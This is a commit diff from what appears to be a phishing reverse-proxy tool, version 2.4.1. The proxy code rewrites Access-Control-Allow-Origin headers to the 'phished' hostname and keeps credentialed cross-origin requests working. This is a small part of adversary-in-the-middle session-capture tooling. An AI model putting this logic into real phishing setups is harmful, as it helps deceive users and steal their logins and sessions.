fix: proper hostname substitution in Access-Control-Allow-Origin

felmoltor · Feb 2, 2021 · 5fc43f4 · 5fc43f4
1 parent e093efa
commit 5fc43f4
Show file tree

Hide file tree

Showing 2 changed files with 11 additions and 2 deletions.
diff --git a/core/banner.go b/core/banner.go
@@ -8,7 +8,7 @@ import (
 )
 
 const (
-	VERSION = "2.4.0"
+	VERSION = "2.4.1"
 )
 
 func putAsciiArt(s string) {

diff --git a/core/http_proxy.go b/core/http_proxy.go
@@ -607,7 +607,16 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 
 			allow_origin := resp.Header.Get("Access-Control-Allow-Origin")
 			if allow_origin != "" {
-				resp.Header.Set("Access-Control-Allow-Origin", "*")
+				if allow_origin != "*" {
+					if u, err := url.Parse(allow_origin); err == nil {
+						if o_host, ok := p.replaceHostWithPhished(u.Host); ok {
+							resp.Header.Set("Access-Control-Allow-Origin", u.Scheme+"://"+o_host)
+						}
+					} else {
+						log.Warning("can't parse URL from 'Access-Control-Allow-Origin' header: %s", allow_origin)
+						resp.Header.Set("Access-Control-Allow-Origin", "*")
+					}
+				}
 				resp.Header.Set("Access-Control-Allow-Credentials", "true")
 			}
 			var rm_headers = []string{
-Original file line number
+Diff line change
@@ Expand Up / @@ -8,7 +8,7 @@ import ( @@
     )
     const (
-    	VERSION = "2.4.0"
+    	VERSION = "2.4.1"
     )
     func putAsciiArt(s string) {
@@ Expand Down @@